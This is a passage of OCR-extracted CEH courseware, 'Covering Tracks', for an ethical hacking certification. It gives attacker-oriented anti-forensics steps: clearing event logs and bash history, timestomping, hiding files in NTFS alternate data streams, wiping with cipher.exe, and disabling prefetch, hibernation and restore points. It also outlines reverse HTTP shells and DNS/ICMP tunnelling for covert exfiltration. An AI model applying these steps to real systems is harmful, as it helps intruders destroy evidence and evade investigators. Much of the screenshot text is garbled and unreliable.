Module 06 Page 911

Ethical Hacking and Countermeasures Copyright © by EC-Coul All Rights Reserved. Reproduction is Strictly Prohibi

Ethical Hacking and Countermeasures

Exam 312-50 Certified Ethical Hacker

System Hacking

For Windows

=

Navigate to Start > Control double-click Event Viewer

Panel

>

System

and Security >

=

Delete the all the log entries logged while compromising the system

Windows

@ Event Viewer

File

Action

=

View

|G

Application

x

Nu

@nformation @nformation

G] Forwarded Events

Date and Time

Gifomainn sree Information information

21: 4/5/2022 11:21:50PM

4/5/2022 11:21:50 PM

Q@information @information

4/5/2022 11:21:50 PM 4/5/2022 11:21:50 PM

@information

@information

PD tat neon

4/5/2022 11:21:50 PM

|Application &_ Open Saved Log... W Create Custom Vie...

it

4/5/2022 11:21:50 PM 4/5/2022 11:21:50 PM

ionsLo)] (information .& Applicat and Services

[Subscriptions

o

>

Help

Level

>

Tools

=

Y

it

©

Filter Current Log...

Properties

ry Find inde

As... fel Save All Events

4/5/2022 11:21:50 PM

ee

Argon) 14.91.80 0A

x

Event 1033, Security-SPP General jeneral DetailsDetail

[These policies are being excluded since they are only definedw | Policy Names= (Security-SPP-Reserved-EnableNotificationMod |Avo Id=55c92734-d682-4d71-983e-d6ec3#16059F

View [GQ Refresh Help

» ,

| Event 1033, Security-SPP a — (2) Event Properties D

Attach Task To This...

By Copy

>

Figure 6.209: Clearing event logs for Windows

Module 06 Page 912

Ethical Hacking and Countermeasures Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures

Exam 312-50 Certified Ethical Hacker

‘System Hacking For Linux

Navigate to the /var/log directory on the Linux system Open the plaintext /var/log/

file

containing

log

messages

with

text

editor

Delete all the log entries logged while compromising the system boot.tog

332m

5 [fe]l@;32m

6

7 (fJlo:32m

OK

ok

[{3][Om]

Reached

‘orward

target

save

Password

[J[0;1;39mLocal

Encrypt

[3][m] Found device fi]{@;1;39mVirtual Disk 1]

Starting

[][@;1;39mFile

System Check

on /dev/disk/t

ok [Elon] started fz]lo;1;39mFile system check og

8 [f]l0;32m OK [i3)[om] Finished [3][@;1;39mFile System Check ¢ 9 Mounting [fj][0;1;39m/boot/efifgtom...

10 [[E]le;32m 11 [[]{@;32m

ok OK

lirectory watchfi][om.

Rec

cy oo

Om...

“°F

usfijtom.

Paste Delete

[lem] Mounted fi][o;1;39m/boot/efifs|[om. [3/[om] Reached target [fJ[0;1;39mLocal File S)

Select all insert Emoji

Starting f][@;1;39mEnable support for additional ei.

Changecase

wz

Starting [i][@;1;39mLoad AppArmor profilesfj][om...

4 1s

Starting Starting

fi][@;1;39mSet console font and keymapij][0 [{;][@;1;39mTell Plymouth To Write Out Runtime Datafjj][om...

Starting

[{:][@;1;39muncomplicated

13 16

»

|/€825 -FB9ch][om.

> |

Starting [i3][@;1;39mCreate Volatile Files and Directories[fj][@m...

17

18

19 [f]le;32m 20 [[i:](0;32m

21 ([3][0;32m 22 [fiJ[@;32m 23 [fz](@;32m 24 [[](0;32m

Mounting f;][@;1;39mArbitrary Executable File Formats File Systemfjj][om... OK OK

[lm] Finished [][@;1;39mSet console font and keymapfj][om. [{3)[Om] Finished [:|[@;1;39mTell Plymouth To Write Out Runtime Data[][om.

ok

[{:)[om] Mounted [][@;1;39mArbitrary Executable File Formats File Systemf)[om.

ok ok ok

formats{j][om.

25 [fiJlo;32m

firewall fj][om. ..

ok

[f3][om] Finished [i:][@;1;39mUncomplicated firewall fi][om. [)[om] Reached target [fjJ[0;1;39mPreparation for Network{][om.

[{3)[om] Finished [{3][0;1;39mEnable support for additional executable binary

[fi[om] Finished []][0;1;39mCreate Volatile Files and Directories[i][om.

26

Starting

28 29

Starting fi3][@;1;39mNetwork Time Synchronizationfij][om. Starting [i3][@;1;39mRecord System Boot/Shutdown in UTMP[j][Om...

27

30 [[3](0;32m

31 [[i:][@;32m

[j][@;1;39mUserspace

Out-Of-Memory

(OOM)

Killerfij][om...

Starting [:][@;1;39mNetwork Name Resolution[ij][om...

OK OK

[fiom] Finished [i][0;1;39mRecord System Boot/Shutdown in UTMP[3][om. [{3][@m]

Listening

on

ff]

}9mLoad/Save

RF Kill

Switch

Status

Plain Text ~ Tab Width: 8 v

/dev/rfkill

Ln2,col68

watchfii[@m.

Ys

INS

Figure 6.210: Clearing event logs for Linux

Module 06 Page 913

Ethical Hacking and Countermeasures Copyright © by EC-Cot All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures System Hacking

Exam 312-50 Certified Ethical Hacker

Ways to Clear Online Tracks ‘|@

CE H

Remove the Most Recently Used (MRU), delete cookies, clear the cache, turn off Autocomplete,

and clear the Toolbar data from the browsers

From the Privacy Settings inWindows 11

@ @

Right-clickon the Start button, choose Settings, and click on “Personalization” In Personalization, click Start from the left

pane and Turn Off both “Show most used

apps” and “Show recently opened items in Start, Jump Lists, and File Explorer”

@¢==@

From the Registry in Windows 11

© Open the Registry Editor and navigate to HKEY_LOCAL_MACHINE\SOFTWARE\ _ Microsoft\Windows\CurrentVersion\

2

eos

Explorer and then remove the key for

“RecentDocs”

-_ @— 2

©

J

Delete all the values except

Py

"(Default)"

A al.

4

Ways to Clear Online Tracks Attackers can clear online tracks maintained using web history, logs, cookies, cache, downloads, visited time, etc. on the target computer so that the victims cannot notice what online activities the attackers have performed.

What can attackers do to clear their online tracks? =

Use private browsing

=

Delete history in the address field

=

Disable stored history

=

Delete user JavaScript

=

Delete private data

=

Set up multiple users

=

Clear cookies on exit

=

Remove Most Recently Used (MRU)

=

Clear cache on exit

=

Clear toolbar data from browsers

=

Delete downloads

=

Turn off AutoComplete

=

Disable password manager

To clear the online different OSs.

Module 06 Page 914

tracks of various

=

Clear data in the password manager Delete saved sessions

activities,

attackers

should

follow

different

paths for

Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures System Hacking The steps to clear online tracks from (Windows 11) are as follows: =

=

Exam 312-50 Certified Ethical Hacker the

Privacy

Settings

or from

the Windows

registry

From the Privacy Settings in Windows 11 o

Right-click on the Start button, choose Settings, and click on Personalization

o

In Personalization, click Start from the left pane and turn off both “Show most used apps” and “Show recently opened items in Start, Jump Lists, and File Explorer”

From the Registry in Windows 11 o

Open the Registry Editor and navigate to HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer and then remove the key for “RecentDocs”

o.

Delete all the values except “(Default)”

Module 06 Page 915

Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures System Hacking

Exam 312-50 Certified Ethical Hacker

CEH

Covering BASH Shell Tracks (@

The BASH is an sh-compatible shell that stores command history ina

file called bash_history

@ You can view the saved command history using the more~/.bash_history command Attackers use the following commands to clear the saved command history tracks: |@ Disabling history © export BISTSIZE=0 | Clearing the history © history -c (Clears the stored history) @ history -w (Clears history of the current shell) |@ Clearing the user's complete history © cat /dev/null > ~.bash history 66 history -c 66 exit |@ Shredding the history © shred ~/.bash_history (Shreds the history file, making its content unreadable) @ shred ~/.bash history 66 cat /dev/null > -bash_history && history -c 66 exit (Shreds the history file and clears the evidence of the command)

Copyright © by

Al Rights Reserved Reproduction i

Covering BASH Shell Tracks Bourne Again Shell, or Bash, is an sh-compatible shell that stores command history in a file called the bash history. You can view the saved command history using the more ~/.bash_history command. This feature of Bash is a problem for hackers, as investigators could use the bash_history file to track the origin of an attack and the exact commands used by an intruder to compromise a

system.

Attackers use the following commands to clear the saved command history tracks: =

Disabling history export

HISTSIZE=0

This command disables the Bash shell from saving history. HISTSIZE determines the number of commands to be saved, which is set to 0. After executing this command, attackers lose their privilege to review the previously used commands. =

Clearing the history ©

history

-c

This command is useful in clearing the stored history. It is an effective alternative to disabling the history command as, in this command, an attacker has the convenience of rewriting or reviewing the earlier used commands. ©

history

-w

This command only deletes the history of the current shell, whereas the command history of other shells remains unaffected.

Module 06 Page 916

Ethical Hacking and Countermeasures Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited

Ethical Hacking and Countermeasures

Exam 312-50 Certified Ethical Hacker

System Hacking =

Clearing the user’s complete history cat

/dev/null

>

~.bash_history

&&

history

This command deletes the complete command and exits the shell. =

-c

&&

exit

history of the current and all other shells

Shredding the history ©

shred

~/.bash_history

This command shreds the history file and renders its contents unreadable. It is useful when an investigator locates the file, but owing to this command, becomes unable to read any content in the history file. o

shred ~/.bash_history&& history -c && exit

cat

/dev/null

>

.bash_history

&&

This command first shreds the history file, then deletes the file, and finally clears all the evidence of its usage.

Figure 6.211: Covering Bash shell tracks

Module 06 Page 917

Ethical Hacking and Countermeasures Copyright © by EC-Council

All Rights Reserved. Reproduction is Strictly Prohibited

Ethical Hacking and Countermeasures System Hacking

Exam 312-50 Certified Ethical Hacker

Covering Tracks on a Network

CE H

‘@ The attacker installs a reverse HTTP shell on the victim’s machine, which is programmed in such a way that it would ask for commands from an external master who controlsthe reverse HTTP shell

sing) RESErse) HTTP Shells

@ The victim here willact as a web client who is executing HTTP GET commands, whereas the attacker behaves like a web server and respondsto the requests 2

@ This type of trafficis considered as normal traffic by an organization’snetwork perimeter security controlslike DMZ, firewall, etc. @ The attacker uses an ICMP tunneling technique to use ICMP echo and ICMP reply packetsas a carrier of the TCP payload, toaccessor controla system stealthily oe system an @ The victim’s is triggered to encapsulate the TCP payload ;in an ICMP echo packet that Fis forwarded to the proxy server

Using Reverse ICMP Tunnels

© Organizations have security mechanisms that only check incoming ICMP packets but not outgoing ICMP packets, therefore attackers can easily bypass the firewall

Covering Tracks on a Network (Cont’d) ‘@

Using DNS Tunneling

|

Attackers can use DNS tunneling to encode malicious content or data of other programs

within DNS queries and replies

Ns tunneling createsa back channel to access a remote server and applications

| @ Attackers can make use of this back channel to exfiltrate stolen, confidential, or sensitive information from the server

, Using

CE H

TCP

Parameters 4

‘@

TCP parameters can be used by the attacker to distribute the payload and

‘@

TCP fields where data can be hidden are as follows:

to create covert channels ©

IP Identification field

@

TCPacknowledgement number

@

TCPinitial sequence number

s Reserved Reproduction is Strictly Prohibited

Covering Tracks on a Network =

Using Reverse HTTP Shells

An attacker starts this attack by first infecting a victim’s machine with malicious code, and thereby installing a reverse HTTP shell on the victim’s system. This reverse HTTP shell is programmed in such a way that it asks for commands to an external master, which controls the reverse HTTP shell on a regular basis. This type of traffic is Module 06 Page 918

Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures System Hacking

Exam 312-50 Certified Ethical Hacker

considered normal by an organization’s network perimeter security controls like DMZ, firewall, etc. Once an attacker types something on the master system, the command is retrieved and executed on the victim’s system. The victim here acts as a web client who executes the HTTP GET commands, whereas the attacker behaves like a web server and responds to the requests. Once the previous commands are executed, the results are sent in the next web request. All the other users in the network can normally access the Internet; therefore, the traffic between the attacker and the victim is seen as normal. =

Using Reverse ICMP Tunnels

Internet Control Message Protocol (ICMP) tunneling is a technique in which an attacker uses ICMP echo and reply packets as carriers of TCP payload, to stealthily access or control a system. This method can be used to easily bypass firewall rules, because most organizations have security mechanisms that only check incoming ICMP packets but not outgoing ones. An attacker first configures the local client to connect with the victim. The victim’s system is triggered to encapsulate a TCP payload in an ICMP echo packet, which is forwarded to the proxy server. The proxy server de-encapsulates and extracts the TCP payload, and then sends it to the attacker. =

Using DNS Tunneling Attackers can use DNS tunneling to encode malicious content or data of other programs within DNS queries and replies. DNS tunneling usually includes data payload that can be added to the victim’s DNS server to create a backchannel to access a remote server and applications. Attackers can employ this backchannel information from the server.

to exfiltrate stolen, confidential,

or sensitive

Attackers perform DNS tunneling in various stages; first, they compromise an internal system

to

create

a

connection

with

an

external

network.

Then,

they

use

that

compromised system as a command and control server to remotely access the system and transfer files covertly from within to outside the network. =

Using TCP Parameters

TCP parameters can be used by the attacker to distribute the payload and to create covert channels. Some of the TCP fields where data can be hidden are as follows: ©

IP Identification Field: This is an easy approach in which a payload is transferred bitwise over an established session between two systems. In this approach, one character is encapsulated per packet.

Module 06 Page 919

Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures System Hacking

Exam 312-50 Certified Ethical Hacker

o

TCP Acknowledgement Number: This approach is quite difficult as it uses a bounce server that receives packets from the victim and sends it to an attacker. Here, one hidden character is relayed by the bounce server per packet.

o

TCP Initial Sequence Number: This method also does not require an established connection between the two systems. Here, one hidden character is encapsulated per SYN request and reset packet.

Module 06 Page 920

Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures System Hacking

Exam 312-50 Certified Ethical Hacker

CEH

Covering Tracks on an OS Windows

£y

UNIX/LINUX

&

|@ NTFS hasa feature known as Alternate Data Streams that

@ Files in UNIX can be hidden just by appending a dot (.) in

@ Given below are some steps to hidea file using NTFS: © Open the command prompt with an elevated privilege

@ Attackers can use this feature to edit the log files to cover their tracks

allows attackers to hide a file behind normal files

@ Type the command“type

C:\SecretFile.txt

front of a file name

>

C:\LegitFile. txt:SecretFile.txt” (here, the file is kept in C drive where the SecretFile.txt file is hidden inside LegitFile.tt file) © To view the hidden file, type “moze < C:\SecretFile. txt’ (for this youneed to know the hidden file name)

@

Attackers can use the “export

HISTSIZE=0”

command

to delete the command history and the specific command they used to hide log files

IB Adminstrator Command Promst

Copyright © by

iy Prohibited.

Covering Tracks on an OS =

Windows NTFS has a feature called ADS that allows attackers to hide a file behind other normal files. Steps to hide files using NTFS are as follows: o

Open the command prompt with an elevated privilege

o

Type the command “type C:\SecretFile.txt >C:\LegitFile.txt:SecretFile.txt” (here, the file is kept in the C drive where the SecretFile.txt file is hidden inside the LegitFile.txt file)

o

To view the hidden file, type “more know the hidden file name)

< C:\SecretFile.txt” (for this you need to

EBX Administrator: Command Prompt

-

oO

x

Figure 6.212: Covering tracks on Windows OS

Modifying Time timestomp

file_name.doc

-z





(or) Module 06 Page 921

Ethical Hacking and Countermeasures Copyright © by EC-Council

All Rights Reserved. Reproduction is Strictly Prohibited

Ethical Hacking and Countermeasures System Hacking

Exam 312-50 Certified Ethical Hacker

powershell -Command Date) .AddHours (-10)"

"(Get-Item

$File_name)

.LastWriteTime

=

$(Get-

This command is useful for changing the access time of specific files. Using this command, an attacker can rewrite the date and time of last access to hide traces and mislead the investigation. =

UNIX/LINUX

Files in UNIX can be hidden just by appending a dot (.) in front of a file name. In UNIX, each directory is subdivided into two directories: current directory (.) and parent directory (..). Attackers give these a similar name like “. ” (with a space after . ). These hidden files are usually placed in /dev, /tmp, and /etc. An attacker can also edit the log files to cover their tracks. However, sometimes, using this technique of hiding files, an attacker can leave his/her trace behind because the command he/she used to open a file will be recorded in a .bash_history file. A smart attacker knows how to overcome such a problem; he/she does so by using the export HISTSIZE=0 command.

Figure 6.213: Covering tracks on UNIX OS

Modifying Date and Time ©

touch

-a

-d

'

'

$File_name

The above command is useful for changing the access time of a specific file. Using the touch command, attackers can change the date and time as per their requirement. This command is executed only if an attacker can manage to steal admin credentials. o

touch

-m

-d

'

'

$File_name

Attackers can also use the same command with the parameter “-m” to change the date and time of last modification to mislead security professionals. In both cases, the parameter “d” updates the modification or access date/time.

Module 06 Page 922

Ethical Hacking and Countermeasures Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited

Ethical Hacking and Countermeasures System Hacking

Exam 312-50 Certified Ethical Hacker

Delete Files using Cipher.exe @ Cipher.exe is an in-built Windows command-line tool that can be used to securely delete data by overwriting it to avoid their recovery in the future @ To overwrite deleted files in a specific folder: cipher /w::\

@ To overwrite all the deleted files in the given drive: cipher /w:

I Administrator: Command Prompt

Conyright © by

Al Rights Reserved. Reproduction i Strictly Prohibited.

Delete Files using Cipher.exe Cipher.exe is an in-built Windows command-line tool that can be used to securely delete data by overwriting them to avoid recovery in the future. This command also assists in encrypting and decrypting data in NTFS partitions. When an attacker creates and encrypts a malicious text file, at the time of the encryption process, a backup file is created. Therefore, if the encryption process is interrupted, the backup file can be used to recover the data. After the completion of the encryption process, the backup file is deleted, but this deleted file can be recovered using data recovery software and can then be used by security personnel for investigation. To avoid data recovery and cover their tracks, attackers use the Cipher.exe tool to overwrite the deleted files, first with all zeroes (0 x 00), second with all 255s (0 x FF), and then finally with random numbers. The attacker can delete files using Cipher.exe by implementing the following steps: =

Launch command prompt with administrator privileges

=

Use the following command to overwrite deleted files in a specific folder: cipher

=

/w::\

Use the following command to overwrite all the deleted files in the given drive: cipher

Module 06 Page 923

/w:

Ethical Hacking and Countermeasures Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited

Ethical Hacking and Countermeasures System Hacking

Exam 312-50 Certified Ethical Hacker

EBX Administrator: Command Prompt

-

o

xX

Figure 6.214: Screenshot of Cipher.exe command

Module 06 Page 924

Ethical Hacking and Countermeasures Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited

Ethical Hacking and Countermeasures System Hacking

Disable Windows

Exam 312-50 Certified Ethical Hacker

Functionality

Disable the Last Access Timestamp

C iE H

Be Basson Sorenson

oe

*

—_—_— fsutil is a utility in Windows used to set the NTFS.

|

volume behavior parameter, DisableLastAccess,

which controls enabling or disabling of the last access timestamp

Disable Windows Hibernation

. Tenpener TREY LOCAL MACHINE SYSTEM CurrertControlser\Contran Power I

Disable Windows hibernation using the Registry

Editor or powercfg command

——

“_

Se

fms

rpm

Sa

ie So Sone cosmo) a ‘econo ane

Disable Windows Functionality (Cont’d) Disable Windows Virtual Memory

(Paging File)

x

CE H

Disable System Restore Points

Al Rights Reserved. Reproduction i Strictly Prohibited

Module 06 Page 925

Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures

Exam 312-50 Certified Ethical Hacker

System Hacking

Disable Windows Functionality (Cont’d) Disable

Windows Thumbnail Cache

[an

co

Disable

CE H Windows

Prefetch Feature

|

Disable Windows Functionality =

Disable the Last Access Timestamp The last access timestamp of a file contains information regarding the time and data when the specific file was opened for reading or writing. Therefore, every time a user accesses a file, the timestamp is updated. Attackers use the fsutil tool to disable or

enable the last access timestamp.

fsutil is a command-line utility in the Windows OS used to set the NTFS volume behavior parameter, DisableLastAccess, which controls the enabling or disabling of the last access timestamp. For example, DisableLastAccess

= 1

DisableLastAccess

= 0 indicates that the last access timestamps are enabled.

Module 06 Page 926

indicates that the last access timestamps are disabled.

Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures System Hacking

Exam 312-50 Certified Ethical Hacker

As shown in the screenshot, attackers use the following command access updates: >fsutil

behavior

set

disablelastaccess

to disable the last

1

-

[BW Administrator: Command Prompt

ia)

x

Figure 6.215: Screenshot of fsutil command

=

Disable Windows Hibernation The hibernate file (Hiberfil.sys) is a hidden system file located in the root directory where the OS is installed. This file contains information regarding the system RAM stored on a hard disk at specific times (when the user selects to hibernate his/her system). This information is crucial as security personnel can use it to investigate an attack on the system. Therefore, disabling Windows hibernation is a crucial step toward covering the tracks. The attacker can disable Windows hibernation through the registry by implementing the following steps: o

Open Registry Editor and navigate to the following location: Computer\HKEY LOCAL MACHINE\SYSTEM\CurrentControlSet\Control\P

ower o

Double-click on HibernateEnabledDefault from the right pane; an Edit DWORD bit) Value dialog box appears

o.

Inthe Value data: field, enter a value of 0 to disable hibernation

o

Press OK

Module 06 Page 927

(32-

Ethical Hacking and Countermeasures Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited

Ethical Hacking and Countermeasures System Hacking

8

Edit

|

Vie

Exam 312-50 Certified Ethical Hacker

Help lodeinterface Notifications blll Sfp seston Ba pnp var Enanyjfatel odernSler poc Ba Powerrequ > Ta PowerSettir ‘De Profile

1 Type REG_SZ REG_DWORD REG_DWORD REG_DWORD REG_DWORD REG_DWORD REG_DWORD REG_DWORD REG_DWORD REG_DWORD.

|| Name || 38) (Default) 3] Class InitialUnparkCount CustomizeDuringSetup EnergyEstimationEnabled EventProcessorgnabled HiberFileSizePercent || a HibernateEnabledDefaut idReliabilityState MfBufferingThreshold ) || 2) PerfCalculateActualUtilizatiog 3) SourceSettingsVersion

SecurityDes | || $3) TimerRebaseThresholdOnDr Sync

Data (value net set) 000000040 (64) 000000001 (1) 000000001 (1) 00000001 (1) 000000000(0) 000000001 (1) 000000001 (1) 000000000(0) 000000001 (1),

Edit DWORD (32-bit) Value Value name:

HibemateEnabledDefaut

‘DB User

> Ea Print

Value data:

&> © reac RadioManage:

Base

a

‘Dy ProductOptior

4

ee O Decimal ie

Remote Assist

|

RetailDemo

‘Bi SafeBoot

ok §

Cancel

Figure 6.216: Screenshot of Registry Editor to disable hibernation

Attackers can also disable Windows implementing the following steps:

through

o

Launch command prompt with administrator privileges

o.

Use the following command to disable hibernation: powercfg.exe

=

hibernation

/hibernate

command

prompt

by

off

Disable Windows Virtual Memory (Paging File) Virtual memory, also called a paging file, is a special file in Windows that is used as a compensation when RAM (physical memory) falls short of usable space. For example, if an attacker has an encrypted file and wants to read it, he/she must first decrypt it. This decrypted file stays in the paging file, even after the attacker logs out of the system. Moreover, some third-party programs can be used to store plaintext passwords and other sensitive information temporarily. Therefore, disabling paging in Windows is a crucial step toward covering tracks. The attacker can disable paging by implementing the following steps: 1.

Open Control Panel and navigate to the following location:

System and Security > System 2.

> Advanced system settings

A System Properties dialog box appears; in the Advanced tab, click on Settings... under the Performance section

Module 06 Page 928

Ethical Hacking and Countermeasures Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited

Ethical Hacking and Countermeasures System Hacking

3.

Exam 312-50 Certified Ethical Hacker

A Performance Options dialog box appears; go to the Advanced tab and click on Change... under the Virtual Memory section

4.

A Virtual Memory size for all drives

5.

Select the drive where paging should be disabled, then check the option No paging file and click Set

6.

In the System Properties window, click Yes

7.

Finally, click OK to implement the changes

«

4

dialog box appears; uncheck Automatically manage

@_> ControlPanel > System and Security

ogy Home ‘¢ System and Security Network and Internet Hardware and Sound Programs User Accounts Clock and Region

Face of Access

by

pete Q

Admin Local Account setting

° Bluetooth & devices ‘%

Network & internet

Personalization WE Apps S

Accounts

D Time & language @ Gaming K Accessibilty @

Privacy & security

@

Windows Update

paging file

)

Veualeffects Advanced Data Exeauton Preventon Processors Choote he CiAutomatically manage paging file sie forall drives Adjust for Paging filesize for each dive Drive [Volume Label] Paging File Size (MB) Computer Name Hardwa © Brogran E [New Volume] ‘None You must be logged on} Peomance Virtual men Vasual eect, process Apaging System Properties were RAM, ityou disable the paging file or st the initial size to less than Total pagin 400 megabytes and a system error occurs, Windows might not record deals that could help identity the problem. Do you User Proes ‘want to continue? Desktop settings relate

e

S

Statup and Recovery System startup, oyster,

O System managed size

Bisaaaate] System > System protection o

A System Properties dialog box appears; in the System drive and click on Configure...

Module 06 Page 929

Protection tab, select the

Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures System Hacking

Exam 312-50 Certified Ethical Hacker

o

Under the Restore Settings section, select the Disable system protection option and click on the Delete button

oO

The System Protection wizard appears; click Continue to delete all restore points on the drive

o

Click OK

co

Repeat the above steps for all disk partitions

s «

-

©

> Control Panel

cata ie asgescnagselaiay

> System and Security

ee Cuctam

Admin

Network and Intemet Programs

Computer Name

Personalization

Hardware

Advanced

+ Ahaut

System Protection

Remote

eas Sytem Restore meceeoresay Wigton Re aR cm adsense RS So Ra tioRelate!

PC

this

Rename

Use system protection to

tin

F

Clock and Reon wasn

2

.

| a ©

system

WO,

Bisetooth &

[Obeaiermennan|

he Local Disk C) (System)

Apps

S

Accounts

tan iin

Available Dives

Personalizati

elon

A

ee

| Configure restore settings, mand)

3 Time & lang

© coming K

Accessibility,

@

Privacy & security

K

OTum on system protection

Cen. | iacciabis 7

|

ep rolmredoets Tterete o cae a ator port. i

x

You will not be able to undo unwanted system changes on this

drive. Are you sure you want to continue? This will delete all restore

backing

on this drive. ke points

This might

e

include older

. Del te

a estore pants for ths ve

cS) (a)

.

system image

mt

Caneel

,

@l=]

cores

sooty

Figure 6.218: Screenshot of disabling restore points through Control Panel

o

Disable Windows Thumbnail Cache thumbs.db is a Windows file that stores thumbnails of document types such as PPTX and DOCX, and graphic files such as GIF, JPEG, PNG, and TIFF. This thumbnail file contains information regarding files that were previously deleted or used on the system. For example, if an attacker has used an image file to hide a malicious file and later deleted it, a thumbnail of this image is stored inside the thumbs.db file, which reveals that the deleted file was previously used on the system.

Module 06 Page 930

Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures

Exam 312-50 Certified Ethical Hacker

‘System Hacking

The attacker can disable the thumbnail cache by implementing the following steps: o

Press Windows + R keys to open the Run dialog box

©.

Type gpedit.msc and press Enter or click OK

o

The Local Group Policy Editor window appears; navigate to User Configuration > Administrative Templates > Windows Components > File Explorer

o

Double-click on the Turn off the caching of thumbnails in hidden thumbs.db files setting from the right pane

o

Select Enabled to turn off the thumbnail cache

©

Click OK

File Action

View

Help

© | 21) | BLE gs sm oft the caching of thumbnails in hidden thumbs. files ¥ 15] Windows Compon ‘Add features to EE] Tum off the caching of thumbnails in hidden thumbs.db fles App runtime Application ntCol a attachme Mg ONotConfigured Comment: (5) AutoPlay Polic @ Calculator (3 Cloud Content O Disabled

(5) Credential User

1 Data Collection

(Gl Desktop Gadge > © Desktop Windo Options:

1 Digital Locker

i Edgeige vl v © File Explorer (| CommonQ} Explorer Fed Bp reviou ae s | (G File Revocation

i ime Instanet Search. pe | > el Location jon an aaiil| Microsoft Edge > 15) Microsoft Mani}

‘Supported on:

o

x

ious seting || Next Setting

I

Pack 1 Service s Vista ow Wind

Help: ‘Tums jurns off the cachica hing ng of thumbnthumbnails ails in hidden b filfiles. hidden thumbs thumbs.d.db This policy setting allows you to configure File Explorer to cache

thumbnails of items residing in network folders in hidden thumbs.db files.

If you enable this policy setting, File Explorer does not create,

b read from, or write to thumbs.dfiles.

g, rer you s,disable or donot configure this mbs policy settin Fil Explo ‘create reads from, and writes to thu .db files.

> (9 Microsoft User:

(5 Matitasking > [5 NetMeeting

(3 Network Sharin @ oose

1 PresentationSe

asstees

> 1 Remote Deskto

cone)

t0y _)

AT setting(s) Figure 6.219: Screenshot of disabling the thumbnail cache in Local Group Policy Editor

Module 06 Page 931

Ethical Hacking and Countermeasures Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures System Hacking

=

Exam 312-50 Certified Ethical Hacker

Disable Windows Prefetch Feature Prefetch is a Windows feature that stores specific data about the applications that are typically used by the system users. The stored data help in enhancing system performance by reducing the time required to load or start applications.

For example, if an attacker has installed a malicious application and then uninstalled it, a copy of that application will be stored in the Prefetch file. These Prefetch files can be used by security personnel to recover deleted files during the investigation of a security incident. Attackers can disable the Prefetch feature by implementing the following steps: o

Press Windows + R keys to open the Run dialog box

©.

Type services.msc and press Enter or click OK

o

Search for the SysMain (Superfetch) service and double-click it to open Properties (Local Computer)

o

From the drop-down options in Startup type, select the Disabled option

o

Click OK

File Action View Help ¢9|\miG os|\ari~ __ SysMain Properties (Local Computer) ), Services (Local) Gonwrt [LouCol eeerey gl ewes) Sys Service name: SysMain Stop the serv eee the s¢ Restart Descipion: Martane and improves stem pefomance over Description: ‘Maintains an Path to executable: performance C:AWindows\system32\svchostexe LocalSystemNetworkResticted p

[seed

ene

‘Aitomatic (Delayed Star) ‘Atomatic

x

—_ Status Startup Type Disabled Running Automatic Manual (Trig... Manual (ig... Manual Manual Automatic (.. Running

Manual

Service status: — — —— 3 Sep ae =— You can specty the stat parameters that apply when you stat the service

from here.

=

feply

Von

Manual

Running

Automatic

Running

Automatic

Manual Running Automatic (.. Manual Running Automatic (.. Running Running Running {Running Running

Automatic Automatic (T... Automatic (.. Automatic Manual (Trig...

SysMain

Log Loc: Loci Loci Loc: Loc: Loc: Neb

ioe

Loc: Loc

Loc: Loci Loc: Loci Loc

Loci Loci Loci Loc: Loci

Extended { Standard

Figure 6.220: Screenshot of disabling the Superfetch service

Module 06 Page 932

Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures System Hacking

Exam 312-50 Certified Ethical Hacker

Hiding Artifacts in Windows, Linux, and macOS Hiding Files and Folders in Windows

Hiding Users in Windows

Hiding User Accounts in Windows

Hiding Artifacts in macOS ater = 7) =10620

Copyright © by

Hiding Artifacts in Windows,

Al Rights Reserved. Reproductio

Linux, and macOS

Attackers often attempt to conceal artifacts corresponding to their malicious behavior to bypass security controls. Every OS hides its artifacts such as internal task execution artifacts and critical system files. Attackers leverage this OS feature to conceal their artifacts such as directories, user accounts, files, folders, or any other system-related artifacts within existing artifacts to evade detection. Hiding Artifacts in Windows =

Hiding Files and Folders Attackers use the following command folder in a Windows system: attrib

Module 06 Page 933

+h

+s

+r

with administrator privileges to hide any file or

Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures System Hacking

Exam 312-50 Certified Ethical Hacker

Command Prompt ir C ha: Number

Network and Sharing Center > Change Advanced Sharing Settings. Select a network profile and under File and Printer Sharing section, select Turn off file and printer sharing. This will prevent file sharing abuse. =

Installation by other Malware A piece of malware that can command and control will often be able to re-connect to the malware operator’s site using common browsing protocols. This functionality allows malware on the internal network to receive both software and commands from the outside. In such cases, the malware installed on one system drives the installation of other malware on the network, thereby causing damage to the network.

=

